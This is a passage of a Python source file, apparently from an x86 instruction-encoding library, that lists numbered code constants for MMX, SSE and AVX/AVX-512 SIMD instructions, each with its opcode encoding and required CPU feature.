``EVEX.128.66.0F.WIG E8 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSUBSB_YMM_K1Z_YMM_YMMM256: int = 2405
"""
``VPSUBSB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG E8 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSUBSB_ZMM_K1Z_ZMM_ZMMM512: int = 2406
"""
``VPSUBSB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG E8 /r``
``AVX512BW``
``16/32/64-bit``
"""
PSUBSW_MM_MMM64: int = 2407
"""
``PSUBSW mm, mm/m64``
``NP 0F E9 /r``
``MMX``
``16/32/64-bit``
"""
PSUBSW_XMM_XMMM128: int = 2408
"""
``PSUBSW xmm1, xmm2/m128``
``66 0F E9 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSUBSW_XMM_XMM_XMMM128: int = 2409
"""
``VPSUBSW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG E9 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSUBSW_YMM_YMM_YMMM256: int = 2410
"""
``VPSUBSW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG E9 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSUBSW_XMM_K1Z_XMM_XMMM128: int = 2411
"""
``VPSUBSW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG E9 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSUBSW_YMM_K1Z_YMM_YMMM256: int = 2412
"""
``VPSUBSW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG E9 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSUBSW_ZMM_K1Z_ZMM_ZMMM512: int = 2413
"""
``VPSUBSW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG E9 /r``
``AVX512BW``
``16/32/64-bit``
"""
PMINSW_MM_MMM64: int = 2414
"""
``PMINSW mm1, mm2/m64``
``NP 0F EA /r``
``SSE``
``16/32/64-bit``
"""
PMINSW_XMM_XMMM128: int = 2415
"""
``PMINSW xmm1, xmm2/m128``
``66 0F EA /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPMINSW_XMM_XMM_XMMM128: int = 2416
"""
``VPMINSW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG EA /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMINSW_YMM_YMM_YMMM256: int = 2417
"""
``VPMINSW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG EA /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMINSW_XMM_K1Z_XMM_XMMM128: int = 2418
"""
``VPMINSW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG EA /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMINSW_YMM_K1Z_YMM_YMMM256: int = 2419
"""
``VPMINSW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG EA /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMINSW_ZMM_K1Z_ZMM_ZMMM512: int = 2420
"""
``VPMINSW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG EA /r``
``AVX512BW``
``16/32/64-bit``
"""
POR_MM_MMM64: int = 2421
"""
``POR mm, mm/m64``
``NP 0F EB /r``
``MMX``
``16/32/64-bit``
"""
POR_XMM_XMMM128: int = 2422
"""
``POR xmm1, xmm2/m128``
``66 0F EB /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPOR_XMM_XMM_XMMM128: int = 2423
"""
``VPOR xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG EB /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPOR_YMM_YMM_YMMM256: int = 2424
"""
``VPOR ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG EB /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPORD_XMM_K1Z_XMM_XMMM128B32: int = 2425
"""
``VPORD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F.W0 EB /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPORD_YMM_K1Z_YMM_YMMM256B32: int = 2426
"""
``VPORD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F.W0 EB /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPORD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2427
"""
``VPORD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F.W0 EB /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPORQ_XMM_K1Z_XMM_XMMM128B64: int = 2428
"""
``VPORQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 EB /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPORQ_YMM_K1Z_YMM_YMMM256B64: int = 2429
"""
``VPORQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 EB /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPORQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2430
"""
``VPORQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 EB /r``
``AVX512F``
``16/32/64-bit``
"""
PADDSB_MM_MMM64: int = 2431
"""
``PADDSB mm, mm/m64``
``NP 0F EC /r``
``MMX``
``16/32/64-bit``
"""
PADDSB_XMM_XMMM128: int = 2432
"""
``PADDSB xmm1, xmm2/m128``
``66 0F EC /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPADDSB_XMM_XMM_XMMM128: int = 2433
"""
``VPADDSB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG EC /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPADDSB_YMM_YMM_YMMM256: int = 2434
"""
``VPADDSB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG EC /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPADDSB_XMM_K1Z_XMM_XMMM128: int = 2435
"""
``VPADDSB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG EC /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPADDSB_YMM_K1Z_YMM_YMMM256: int = 2436
"""
``VPADDSB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG EC /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPADDSB_ZMM_K1Z_ZMM_ZMMM512: int = 2437
"""
``VPADDSB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG EC /r``
``AVX512BW``
``16/32/64-bit``
"""
PADDSW_MM_MMM64: int = 2438
"""
``PADDSW mm, mm/m64``
``NP 0F ED /r``
``MMX``
``16/32/64-bit``
"""
PADDSW_XMM_XMMM128: int = 2439
"""
``PADDSW xmm1, xmm2/m128``
``66 0F ED /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPADDSW_XMM_XMM_XMMM128: int = 2440
"""
``VPADDSW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG ED /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPADDSW_YMM_YMM_YMMM256: int = 2441
"""
``VPADDSW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG ED /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPADDSW_XMM_K1Z_XMM_XMMM128: int = 2442
"""
``VPADDSW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG ED /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPADDSW_YMM_K1Z_YMM_YMMM256: int = 2443
"""
``VPADDSW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG ED /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPADDSW_ZMM_K1Z_ZMM_ZMMM512: int = 2444
"""
``VPADDSW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG ED /r``
``AVX512BW``
``16/32/64-bit``
"""
PMAXSW_MM_MMM64: int = 2445
"""
``PMAXSW mm1, mm2/m64``
``NP 0F EE /r``
``SSE``
``16/32/64-bit``
"""
PMAXSW_XMM_XMMM128: int = 2446
"""
``PMAXSW xmm1, xmm2/m128``
``66 0F EE /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPMAXSW_XMM_XMM_XMMM128: int = 2447
"""
``VPMAXSW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG EE /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMAXSW_YMM_YMM_YMMM256: int = 2448
"""
``VPMAXSW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG EE /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMAXSW_XMM_K1Z_XMM_XMMM128: int = 2449
"""
``VPMAXSW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG EE /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMAXSW_YMM_K1Z_YMM_YMMM256: int = 2450
"""
``VPMAXSW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG EE /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMAXSW_ZMM_K1Z_ZMM_ZMMM512: int = 2451
"""
``VPMAXSW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG EE /r``
``AVX512BW``
``16/32/64-bit``
"""
PXOR_MM_MMM64: int = 2452
"""
``PXOR mm, mm/m64``
``NP 0F EF /r``
``MMX``
``16/32/64-bit``
"""
PXOR_XMM_XMMM128: int = 2453
"""
``PXOR xmm1, xmm2/m128``
``66 0F EF /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPXOR_XMM_XMM_XMMM128: int = 2454
"""
``VPXOR xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG EF /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPXOR_YMM_YMM_YMMM256: int = 2455
"""
``VPXOR ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG EF /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPXORD_XMM_K1Z_XMM_XMMM128B32: int = 2456
"""
``VPXORD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F.W0 EF /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPXORD_YMM_K1Z_YMM_YMMM256B32: int = 2457
"""
``VPXORD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F.W0 EF /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPXORD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2458
"""
``VPXORD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F.W0 EF /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPXORQ_XMM_K1Z_XMM_XMMM128B64: int = 2459
"""
``VPXORQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 EF /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPXORQ_YMM_K1Z_YMM_YMMM256B64: int = 2460
"""
``VPXORQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 EF /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPXORQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2461
"""
``VPXORQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 EF /r``
``AVX512F``
``16/32/64-bit``
"""
LDDQU_XMM_M128: int = 2462
"""
``LDDQU xmm1, m128``
``F2 0F F0 /r``
``SSE3``
``16/32/64-bit``
"""
VEX_VLDDQU_XMM_M128: int = 2463
"""
``VLDDQU xmm1, m128``
``VEX.128.F2.0F.WIG F0 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VLDDQU_YMM_M256: int = 2464
"""
``VLDDQU ymm1, m256``
``VEX.256.F2.0F.WIG F0 /r``
``AVX``
``16/32/64-bit``
"""
PSLLW_MM_MMM64: int = 2465
"""
``PSLLW mm, mm/m64``
``NP 0F F1 /r``
``MMX``
``16/32/64-bit``
"""
PSLLW_XMM_XMMM128: int = 2466
"""
``PSLLW xmm1, xmm2/m128``
``66 0F F1 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSLLW_XMM_XMM_XMMM128: int = 2467
"""
``VPSLLW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG F1 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSLLW_YMM_YMM_XMMM128: int = 2468
"""
``VPSLLW ymm1, ymm2, xmm3/m128``
``VEX.256.66.0F.WIG F1 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSLLW_XMM_K1Z_XMM_XMMM128: int = 2469
"""
``VPSLLW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG F1 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSLLW_YMM_K1Z_YMM_XMMM128: int = 2470
"""
``VPSLLW ymm1 {k1}{z}, ymm2, xmm3/m128``
``EVEX.256.66.0F.WIG F1 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSLLW_ZMM_K1Z_ZMM_XMMM128: int = 2471
"""
``VPSLLW zmm1 {k1}{z}, zmm2, xmm3/m128``
``EVEX.512.66.0F.WIG F1 /r``
``AVX512BW``
``16/32/64-bit``
"""
PSLLD_MM_MMM64: int = 2472
"""
``PSLLD mm, mm/m64``
``NP 0F F2 /r``
``MMX``
``16/32/64-bit``
"""
PSLLD_XMM_XMMM128: int = 2473
"""
``PSLLD xmm1, xmm2/m128``
``66 0F F2 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSLLD_XMM_XMM_XMMM128: int = 2474
"""
``VPSLLD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG F2 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSLLD_YMM_YMM_XMMM128: int = 2475
"""
``VPSLLD ymm1, ymm2, xmm3/m128``
``VEX.256.66.0F.WIG F2 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSLLD_XMM_K1Z_XMM_XMMM128: int = 2476
"""
``VPSLLD xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.W0 F2 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLD_YMM_K1Z_YMM_XMMM128: int = 2477
"""
``VPSLLD ymm1 {k1}{z}, ymm2, xmm3/m128``
``EVEX.256.66.0F.W0 F2 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLD_ZMM_K1Z_ZMM_XMMM128: int = 2478
"""
``VPSLLD zmm1 {k1}{z}, zmm2, xmm3/m128``
``EVEX.512.66.0F.W0 F2 /r``
``AVX512F``
``16/32/64-bit``
"""
PSLLQ_MM_MMM64: int = 2479
"""
``PSLLQ mm, mm/m64``
``NP 0F F3 /r``
``MMX``
``16/32/64-bit``
"""
PSLLQ_XMM_XMMM128: int = 2480
"""
``PSLLQ xmm1, xmm2/m128``
``66 0F F3 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSLLQ_XMM_XMM_XMMM128: int = 2481
"""
``VPSLLQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG F3 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSLLQ_YMM_YMM_XMMM128: int = 2482
"""
``VPSLLQ ymm1, ymm2, xmm3/m128``
``VEX.256.66.0F.WIG F3 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSLLQ_XMM_K1Z_XMM_XMMM128: int = 2483
"""
``VPSLLQ xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.W1 F3 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLQ_YMM_K1Z_YMM_XMMM128: int = 2484
"""
``VPSLLQ ymm1 {k1}{z}, ymm2, xmm3/m128``
``EVEX.256.66.0F.W1 F3 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSLLQ_ZMM_K1Z_ZMM_XMMM128: int = 2485
"""
``VPSLLQ zmm1 {k1}{z}, zmm2, xmm3/m128``
``EVEX.512.66.0F.W1 F3 /r``
``AVX512F``
``16/32/64-bit``
"""
PMULUDQ_MM_MMM64: int = 2486
"""
``PMULUDQ mm1, mm2/m64``
``NP 0F F4 /r``
``SSE2``
``16/32/64-bit``
"""
PMULUDQ_XMM_XMMM128: int = 2487
"""
``PMULUDQ xmm1, xmm2/m128``
``66 0F F4 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPMULUDQ_XMM_XMM_XMMM128: int = 2488
"""
``VPMULUDQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG F4 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMULUDQ_YMM_YMM_YMMM256: int = 2489
"""
``VPMULUDQ ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG F4 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMULUDQ_XMM_K1Z_XMM_XMMM128B64: int = 2490
"""
``VPMULUDQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 F4 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMULUDQ_YMM_K1Z_YMM_YMMM256B64: int = 2491
"""
``VPMULUDQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 F4 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMULUDQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2492
"""
``VPMULUDQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 F4 /r``
``AVX512F``
``16/32/64-bit``
"""
PMADDWD_MM_MMM64: int = 2493
"""
``PMADDWD mm, mm/m64``
``NP 0F F5 /r``
``MMX``
``16/32/64-bit``
"""
PMADDWD_XMM_XMMM128: int = 2494
"""
``PMADDWD xmm1, xmm2/m128``
``66 0F F5 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPMADDWD_XMM_XMM_XMMM128: int = 2495
"""
``VPMADDWD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG F5 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMADDWD_YMM_YMM_YMMM256: int = 2496
"""
``VPMADDWD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG F5 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMADDWD_XMM_K1Z_XMM_XMMM128: int = 2497
"""
``VPMADDWD xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG F5 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMADDWD_YMM_K1Z_YMM_YMMM256: int = 2498
"""
``VPMADDWD ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG F5 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMADDWD_ZMM_K1Z_ZMM_ZMMM512: int = 2499
"""
``VPMADDWD zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG F5 /r``
``AVX512BW``
``16/32/64-bit``
"""
PSADBW_MM_MMM64: int = 2500
"""
``PSADBW mm1, mm2/m64``
``NP 0F F6 /r``
``SSE``
``16/32/64-bit``
"""
PSADBW_XMM_XMMM128: int = 2501
"""
``PSADBW xmm1, xmm2/m128``
``66 0F F6 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSADBW_XMM_XMM_XMMM128: int = 2502
"""
``VPSADBW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG F6 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSADBW_YMM_YMM_YMMM256: int = 2503
"""
``VPSADBW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG F6 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSADBW_XMM_XMM_XMMM128: int = 2504
"""
``VPSADBW xmm1, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG F6 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSADBW_YMM_YMM_YMMM256: int = 2505
"""
``VPSADBW ymm1, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG F6 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSADBW_ZMM_ZMM_ZMMM512: int = 2506
"""
``VPSADBW zmm1, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG F6 /r``
``AVX512BW``
``16/32/64-bit``
"""
MASKMOVQ_RDI_MM_MM: int = 2507
"""
``MASKMOVQ mm1, mm2``
``NP 0F F7 /r``
``SSE``
``16/32/64-bit``
"""
MASKMOVDQU_RDI_XMM_XMM: int = 2508
"""
``MASKMOVDQU xmm1, xmm2``
``66 0F F7 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMASKMOVDQU_RDI_XMM_XMM: int = 2509
"""
``VMASKMOVDQU xmm1, xmm2``
``VEX.128.66.0F.WIG F7 /r``
``AVX``
``16/32/64-bit``
"""
PSUBB_MM_MMM64: int = 2510
"""
``PSUBB mm, mm/m64``
``NP 0F F8 /r``
``MMX``
``16/32/64-bit``
"""
PSUBB_XMM_XMMM128: int = 2511
"""
``PSUBB xmm1, xmm2/m128``
``66 0F F8 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSUBB_XMM_XMM_XMMM128: int = 2512
"""
``VPSUBB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG F8 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSUBB_YMM_YMM_YMMM256: int = 2513
"""
``VPSUBB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG F8 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSUBB_XMM_K1Z_XMM_XMMM128: int = 2514
"""
``VPSUBB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG F8 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSUBB_YMM_K1Z_YMM_YMMM256: int = 2515
"""
``VPSUBB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG F8 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSUBB_ZMM_K1Z_ZMM_ZMMM512: int = 2516
"""
``VPSUBB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG F8 /r``
``AVX512BW``
``16/32/64-bit``
"""
PSUBW_MM_MMM64: int = 2517
"""
``PSUBW mm, mm/m64``
``NP 0F F9 /r``
``MMX``
``16/32/64-bit``
"""
PSUBW_XMM_XMMM128: int = 2518
"""
``PSUBW xmm1, xmm2/m128``
``66 0F F9 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSUBW_XMM_XMM_XMMM128: int = 2519
"""
``VPSUBW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG F9 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSUBW_YMM_YMM_YMMM256: int = 2520
"""
``VPSUBW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG F9 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSUBW_XMM_K1Z_XMM_XMMM128: int = 2521
"""
``VPSUBW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG F9 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSUBW_YMM_K1Z_YMM_YMMM256: int = 2522
"""
``VPSUBW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG F9 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSUBW_ZMM_K1Z_ZMM_ZMMM512: int = 2523
"""
``VPSUBW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG F9 /r``
``AVX512BW``
``16/32/64-bit``
"""
PSUBD_MM_MMM64: int = 2524
"""
``PSUBD mm, mm/m64``
``NP 0F FA /r``
``MMX``
``16/32/64-bit``
"""
PSUBD_XMM_XMMM128: int = 2525
"""
``PSUBD xmm1, xmm2/m128``
``66 0F FA /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSUBD_XMM_XMM_XMMM128: int = 2526
"""
``VPSUBD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG FA /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSUBD_YMM_YMM_YMMM256: int = 2527
"""
``VPSUBD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG FA /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSUBD_XMM_K1Z_XMM_XMMM128B32: int = 2528
"""
``VPSUBD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F.W0 FA /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSUBD_YMM_K1Z_YMM_YMMM256B32: int = 2529
"""
``VPSUBD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F.W0 FA /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSUBD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2530
"""
``VPSUBD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F.W0 FA /r``
``AVX512F``
``16/32/64-bit``
"""
PSUBQ_MM_MMM64: int = 2531
"""
``PSUBQ mm1, mm2/m64``
``NP 0F FB /r``
``SSE2``
``16/32/64-bit``
"""
PSUBQ_XMM_XMMM128: int = 2532
"""
``PSUBQ xmm1, xmm2/m128``
``66 0F FB /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSUBQ_XMM_XMM_XMMM128: int = 2533
"""
``VPSUBQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG FB /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPSUBQ_YMM_YMM_YMMM256: int = 2534
"""
``VPSUBQ ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG FB /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSUBQ_XMM_K1Z_XMM_XMMM128B64: int = 2535
"""
``VPSUBQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 FB /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSUBQ_YMM_K1Z_YMM_YMMM256B64: int = 2536
"""
``VPSUBQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 FB /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSUBQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2537
"""
``VPSUBQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 FB /r``
``AVX512F``
``16/32/64-bit``
"""
PADDB_MM_MMM64: int = 2538
"""
``PADDB mm, mm/m64``
``NP 0F FC /r``
``MMX``
``16/32/64-bit``
"""
PADDB_XMM_XMMM128: int = 2539
"""
``PADDB xmm1, xmm2/m128``
``66 0F FC /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPADDB_XMM_XMM_XMMM128: int = 2540
"""
``VPADDB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG FC /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPADDB_YMM_YMM_YMMM256: int = 2541
"""
``VPADDB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG FC /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPADDB_XMM_K1Z_XMM_XMMM128: int = 2542
"""
``VPADDB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG FC /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPADDB_YMM_K1Z_YMM_YMMM256: int = 2543
"""
``VPADDB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG FC /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPADDB_ZMM_K1Z_ZMM_ZMMM512: int = 2544
"""
``VPADDB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG FC /r``
``AVX512BW``
``16/32/64-bit``
"""
PADDW_MM_MMM64: int = 2545
"""
``PADDW mm, mm/m64``
``NP 0F FD /r``
``MMX``
``16/32/64-bit``
"""
PADDW_XMM_XMMM128: int = 2546
"""
``PADDW xmm1, xmm2/m128``
``66 0F FD /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPADDW_XMM_XMM_XMMM128: int = 2547
"""
